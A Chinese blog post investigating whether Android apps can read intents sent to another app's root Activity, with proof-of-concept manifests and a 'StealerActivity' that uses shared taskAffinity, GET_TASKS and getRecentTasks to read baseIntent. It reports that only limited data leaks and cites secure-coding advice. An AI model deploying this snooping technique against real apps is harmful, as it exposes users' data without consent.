关于“Android所有根Activity中的Intent都存在被其它程序读到风险”的研究

最新推荐文章于 2021-10-30 22:56:54 发布
最新推荐文章于 2021-10-30 22:56:54 发布
阅读量2.6k 收藏 1
点赞数
分类专栏: Android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Roland_Sun/article/details/28663717
版权

这几天在研究《Android Application Secure Design/Secure Coding Guidebook》,看到其中有一段说道如果一个Activity刚好是Task的根Activity的话,别的程序可以轻易读到发送给该Activity的Intent。顿时觉得比较好奇,稍微研究了一下。

首先,什么是根Activity呢?所谓根Activity其实就是在一个Task中启动的第一个Activity。所有发送给Task根Activity的Intent都会被记录在Task的历史记录中。这样如果另外一个程序的Activity能够加入到那个根Activity的Task栈中,就能够轻易的读到所有发送给该根Activity的Intent。要查到一个Task的历史记录,必须要使用ActivityManager类,并且需要声明使用GET_TASKS权限。

真的是这样吗?下面我们设计一个场景来验证一下看看。假设有两个程序A和B,他们分别有两个Activity,分别编号1和2,这样的话就一共有四个Activity,分别为A1、A2、B1和B2。程序A启动的时候首先打开A1,在A1里面发送Intent,打开A2,并且要求A2创建在一个新Task里,这样A2就是新Task的根Activity。然后启动程序B,先打开B1,在B1里启动B2,并要求B2创建在A2的同一个Task里,看看到底能不能读出Intent信息。

好了,说了那么多,开始行动。先设计程序A,其AndroidManifest.xml如下:

<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.importantapp"
    android:versionCode="1"
    android:versionName="1.0" >

    <uses-sdk
        android:minSdkVersion="8"
        android:targetSdkVersion="18" />

    <application
        android:allowBackup="true"
        android:icon="@drawable/ic_launcher"
        android:label="@string/app_name"
        android:theme="@style/AppTheme" 
        android:debuggable="true" >
        <activity
            android:name="com.example.importantapp.MainActivity"
            android:label="@string/app_name" >
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        
        <activity
            android:name="com.example.importantapp.ImportantActivity"
            android:label="@string/app_name" 
            android:taskAffinity="com.roland.sun.stealer" 
            android:launchMode="singleTask" >
        </activity>
    </application>

</manifest>
看到共有两个Activity,MainActivity和用来被窃取Intent信息的ImportantActivity。注意了,为了保证ImportantActivity被创建在一个新的Task里,我在这里把launchMode设为singleTask,为了保证窃取Intent信息的Activity能和ImportantActivity在同一个Task中创建,我设置了taskAffinity属性。

下面来看看程序B的AndroidManifest.xml:

<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.intentstealer"
    android:versionCode="1"
    android:versionName="1.0" >

    <uses-sdk
        android:minSdkVersion="8"
        android:targetSdkVersion="18" />

    <application
        android:allowBackup="true"
        android:icon="@drawable/ic_launcher"
        android:label="@string/app_name"
        android:theme="@style/AppTheme" 
        android:debuggable="true" >
        <activity
            android:name="com.example.intentstealer.MainActivity"
            android:label="@string/app_name" >
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        
        <activity
            android:name="com.example.intentstealer.StealerActivity"
            android:label="@string/app_name" 
            android:taskAffinity="com.roland.sun.stealer" 
            android:launchMode="singleTask" >
        </activity>
    </application>

	<uses-permission android:name="android.permission.GET_TASKS" />
</manifest>
有两点值得提一下,首先,偷信息的StealerActivity也设置了taskAffinity属性,并且取值和前面的一样。其次,要声明使用android.permission.GET_TASKS权限。
下面来看看Activity是如何实现的,先来看看所谓的A1,即第一个程序的MainActivity: 

protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    setContentView(R.layout.activity_main);
    findViewById(R.id.button1).setOnClickListener(new View.OnClickListener() {  
        @Override  
        public void onClick(View v) {  
            Intent intent = new Intent(MainActivity.this, ImportantActivity.class);
            intent.putExtra("name", "Roland Sun");
            
            startActivity(intent);
        }
    });
}
很简单,如果按了Button,就创建一个新的Intent用来启动新的Activity,并且这个Intent里面还带了用户名的信息。

再来看看所谓的A2,也就是ImportantActivity的实现:

protected void onCreate(Bundle savedInstanceState) {
	super.onCreate(savedInstanceState);
	setContentView(R.layout.activity_important);
		
	Log.v("Important", getIntent().getStringExtra("name"));
}
很简单,启动后获取发送给它的Intent,并在Log中打印出用户名的信息。
下面来看看B1,即偷取Intent信息程序的MainActivity的实现: 

protected void onCreate(Bundle savedInstanceState) {
	super.onCreate(savedInstanceState);
	setContentView(R.layout.activity_main);
		
	findViewById(R.id.button1).setOnClickListener(new View.OnClickListener() {  
            @Override  
            public void onClick(View v) {  
            	Intent intent = new Intent(MainActivity.this, StealerActivity.class);  
            	startActivity(intent);
            }
	});
}
很简单,直接把那个干坏事的B2,也就是这里的StealerActivity启动起来就行了。重点在这个偷Intent的Activity里: 
protected void onCreate(Bundle savedInstanceState) {
	super.onCreate(savedInstanceState);
	setContentView(R.layout.activity_stealer);
		
	// Get an ActivityManager instance
	ActivityManager am = (ActivityManager)getSystemService(ACTIVITY_SERVICE);
	// Get at most 100 recent task info items
	List<ActivityManager.RecentTaskInfo> list = am.getRecentTasks(100, 
							ActivityManager.RECENT_WITH_EXCLUDED);
	for (ActivityManager.RecentTaskInfo r : list) {
		// Get Intent sent to root Activity
		Intent intent =  r.baseIntent;
			
		if (!intent.getComponent().getClassName().endsWith("ImportantActivity"))
			continue;
			
		Log.v("Stealer", intent.toString());
			
		String name = intent.getStringExtra("name");
		if (name != null) {
			Log.v("Stealer", name);
		}
	}
}
首先获得ActivityManager实例,然后获取这个Activity所在Task的所有历史记录,接着遍历这些记录,去除其中的Intent信息,并且查看这个Intent是否是发给要监听的那个Activity的(通过从Intent中获得组件中的类名来过滤),最后在Log中打印Intent并且试着获得该Intent中的附加信息。

编译这两个程序,并试着在设备上运行,看一下结果。顺序是,先打开程序A,从而启动A1,点击上面的Button,启动A2,再按Home键,把这个Activity程序切换到后台,接着打开程序B,点击B1上的Button,启动B2。

先来看看Task的执行状况,将设备连接上电脑(笔者的设备是一台Google Nexus 7二代,Android 4.4.3),打开debug模式,键入命令:

adb shell dumpsys activity
可以在输出中,找到以下信息: 

 Stack #1:

    Task id #62

      TaskRecord{652fd1b0 #62 A=com.roland.sun.stealer U=0 sz=2}

      Intent { cmp=com.example.importantapp/.ImportantActivity (has extras) }

        Hist #1: ActivityRecord{656c89a8 u0 com.example.intentstealer/.StealerActivity t62}

          Intent { flg=0x400000 cmp=com.example.intentstealer/.StealerActivity }

          ProcessRecord{65a86b08 24059:com.example.intentstealer/u0a86}

        Hist #0: ActivityRecord{655c2b18 u0 com.example.importantapp/.ImportantActivity t62}

          Intent { cmp=com.example.importantapp/.ImportantActivity (has extras) }

          ProcessRecord{6531ce10 23869:com.example.importantapp/u0a85}
这就证明了A2(ImportantActivity)和B2(StealerActivity)在一个Task栈中。
下面来翻翻Log,可以找到下面的记录:



看到没有,StealerActivity确实获得了发送给ImportantActivity的Intent信息,但是没有如愿打印出用户名信息。

这说明什么问题?说明如果一个Activity是一个Task的根Activity,确实存在风险,让其它的应用程序获得发送给该Activity的所有Intent,但是信息量非常有限,最重要的附加信息是获取不到的。所以,想用这个干坏事的同学们可以回家洗洗睡了。

好了,最后来总结一下想要利用这个风险的前提条件:

1)那个你想窃取信息的Activity必须出现在一个Task的根中;

2)要窃取信息的Activity必须能够保证被加载到那个Task中(没有taskAffinity属性这种情况几乎没办法出现);

3)用户必须授予窃取信息程序android.permission.GET_TASKS权限。

以上条件缺一不可,并且即使都满足,获得信息量也是非常有限的。

为了保证万无一失,在《Android Application Secure Design/Secure Coding Guidebook》中,要求禁止使用taskAffinity和launchMode属性。

Roland_Sun
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
php 运行外部程序_php 运行外部程序的一个潜在风险
weixin_34504277的博客
03-09 106
php 有 exec system popen 等一系列运行外部程序的函数。在 web 环境使用这些函数的时候,即使控制好了权限,保证了被执行程序本身的安全,还可能有另外的潜在风险。 php 的这些函数实际上是使用了 popen 函数。popen 利用了 vfork 来启动一个 shell 子php 有 exec system popen 等一系列运行外部程序的函数。在 web 环境使用这...
Implicit Intent _ 通过浏览器打开App并传递参数的风险
weixin_30482383的博客
07-10 121
目录 Perniciousness 构成漏洞的条件 Flow Chart Perniciousness 这种属于业务逻辑漏洞,具体危害,得看逻辑怎么写。 构成漏洞的条件 定义了scheme,可以让外部调起Activity,并接收参数 该Activity内部使用了WebView加载...
Android APK安全漏洞的些许问题
W_DevilMayCry的博客
04-17 2148
引言 很久没有写博客,最近公司的一些老项目在接受安全检查的时候发现了很多的漏洞,说实话真的是被坑的挺难受的,再次记录一下。希望可以帮到碰到同样问题的猿友们。 1.Janus签名漏洞 为了提升安卓系统的安全性,Google发布了新的签名认证体系signature scheme V2。由于,signature scheme V2需要对App进行重新发布,而大量的已经存在的App APK无法使用V2校验...
2021-10-21 Android-Activity
weixin_45823022的博客
10-30 748
一、第一个程序 1. 代码分析 1.1 Manifest.xml 整个项目的配置文件,在程序定义的所有四大组件都需要在这个文件里注册 <activity android:name=".MainActivity" android:exported="true"> <intent-filter> <action android:name="android.intent.acti
android 常见漏洞总结
weixin_41508948的博客
01-08 2470
对于每种漏洞只写出了原理和防护建议,并没有给出实例,投了下Freebuf没通过,说是内容不够详实,的确只是给出了文字说明,没有把实例写下来的确存在不足,不管怎样,我先放这里记录一下。     目录 目录 目录... 1 Activity漏洞... 3 越权绕过漏洞... 3 钓鱼欺诈劫持... 3 隐式启动intent包含敏感数据... 3 拒绝服务... 3 Service...
Android编程实现两个Activity之间共享数据及互相访问的方法
09-03
这样,即使`ActivityMain`被销毁,这个静态成员仍然存在,直到应用程序结束。 ```java public class ActivityMain extends Activity { public static ActivityMain MainAct; @Override public void onCreate...
Android activity间的数据传递,选择头像
11-22
Android应用开发Activity是应用程序的基本组件,用于展示用户界面和处理用户交互。当我们需要在不同的Activity之间传递数据时,比如用户选择头像的操作,就需要掌握Activity间的数据传递技术。本文将深入探讨...
详解AndroidIntentService的使用方法
01-20
Android开发IntentService是一个非常重要的组件,它专门用于执行后台异步任务,特别是那些可能需要较长时间的网络请求或I/O操作。IntentService继承自Service,但提供了更便捷和安全的方式来处理这些任务,...
android实现activity直接的传值问题
12-28
Android开发Activity是应用程序的基本组件,负责用户界面的展示和交互。当需要在不同的Activity之间传递数据时,Android提供了多种方式来实现这一功能。本文将深入探讨如何在Android实现在Activity之间直接...
Android调用系统自带浏览器打开网页的实现方法
01-20
Android开发调用系统自带浏览器或者特定第三方浏览器打开网页是一个常见的需求。本文将详细介绍如何实现这一功能。 首先,启动Android默认浏览器的方法非常简单。通过发送一个隐式Intent,我们可以让系统自动...
android应用安全——组件通信安全Intent
xyzlmn的专栏
04-16 320
这里主要涉及到了Activity、Content Provider、Service、Broadcast Receiver等。这些如果在Androidmanifest.xml配置不当,会被其他应用调用,引起风险android应用内部的Activity、Service、Broadcast Receiver等,他们通过Intent通信,组件间需要通信就需要在Androidmanifest.xml...
Intent的属性-Component属性
02-14 1456
Intent代表了Android应用的启动“意图”,Android应用汇Intent来启动指定组件,至于到底启动哪个组件,取决于Intent的各个属性,Intent对象大致包含Component、Action、Category、Data、Type、Extra和Flag这7种属性 Intent的Component属性需要接受一个ComponentName对象,ComponentName对象包含
(三)Android IntentIntentFilter整理笔记
NOMALJAVAEST的博客
12-16 567
1.Intent大致包含三种属性:component,Action,Category,Data,Type,Extra和Flag; 2.Companent属性需要接受一个ComponentName对象 3.显示Intent:指定了component属性,实际上Intent已经提供了一个简化的构造器,已经明确将要启动哪个组件,没有指定Component属性的Intent称为隐式Intent 4.
安卓安全问题手册
白云天的博客
11-12 516
问题:RSA加密算法不安全使用带来的安全风险 RSA加密算法是一种非对称加密算法。当其密钥长度过短,通常认为长度小于512位时,就会存在较高的被破解风险;没有使用正确的工作模式和填充方式,将会存在重放攻击的风险。因RSA加密算法不安全使用造成的加密方法失效,可能造成客户端隐私数据泄露、加密文件破解、传输数据被获取、间人攻击等后果,导致用户敏感信息被窃取。 解决方案 使用RSA算法进行数字签...
android 账户管理,5.3 将内部账户添加到账户管理器-安卓应用安全指南(Android Application Secure Design/Secure Coding Guidebook)...
weixin_33814002的博客
05-25 142
5.3 将内部账户添加到账户管理器账户管理器是 Android OS 的系统,它集管理帐户信息,是应用访问在线服务和认证令牌所必需的(帐户名称,密码)。 用户需要提前将账户信息注册到账户管理器,当应用尝试访问在线服务时,账户管理器在获得用户权限后,会自动提供应用认证令牌。 账户管理器的优势在于,应用不需要处理极其敏感的信息和密码。使用账户管理器 的账户管理功能的结构如下图 5.3-1 所示。 “...
Android安全风险与防范措施
weixin_56945835的博客
04-07 4545
做好的apk文件,被检测工具检测出一大堆风险问题,是不是感觉自己的付出白费了,今天咱就聊聊android安全防范问题。 一,先说安全检查方面的吧 1,源文件安全问题方面 1篡改和二次打包风险 2应用签名未校验风险 3Java代码反编译风险检测 4代码未混淆风险检测 5资源文件泄露风险检测 2,数据存储安全问题方面 2.1WebView明文存储密码风险检测 2.2Internal Storage数据全局可读写风险检测 3.3加密算法不安全使用风险 ...
AndroidActivityIntent的使用
qq_40927914的博客
10-22 516
手动创建一个Activity 1.创建继承自ActivityActivity public class Detail extends Activity {//继承Activity //...2 } 2.重写需要的回调方法 @Override protected void onCreate(Bundle savedInstanceState) {//重写onCreate方法 ...
Activity 的4种启动模式,分析的简单全面
qq_30855081的博客
08-29 682
今天想来说说Android的启动模式
Android程序设计:ActivityIntent深度解析
Android程序设计Activity是构建用户界面的基本单元,它代表了用户可以看到和交互的屏幕。本资源主要探讨了Activity及其与其它组件的关系,包括Intent、Service、Broadcast以及数据存储等方面。 1. **Activity...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值